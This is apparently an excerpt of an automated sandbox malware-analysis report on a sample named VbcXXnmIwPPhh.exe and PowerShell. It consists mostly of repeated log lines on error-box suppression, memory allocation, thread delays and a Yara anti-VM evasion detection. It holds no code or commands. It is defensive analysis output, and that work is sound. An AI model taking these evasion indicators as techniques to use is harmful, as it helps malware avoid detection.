Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 3040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 3270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 7F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 8F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 9100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: A100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 1680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 31B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596590	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 594865	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 594531	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6282	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3283	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Window / User API: threadDelayed 1672	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Window / User API: threadDelayed 8189	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Window / User API: foregroundWindowGot 1735	Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 3500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4512	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599560s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596590s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -594865s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924	Thread sleep time: -594531s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599780	Jump to behavior
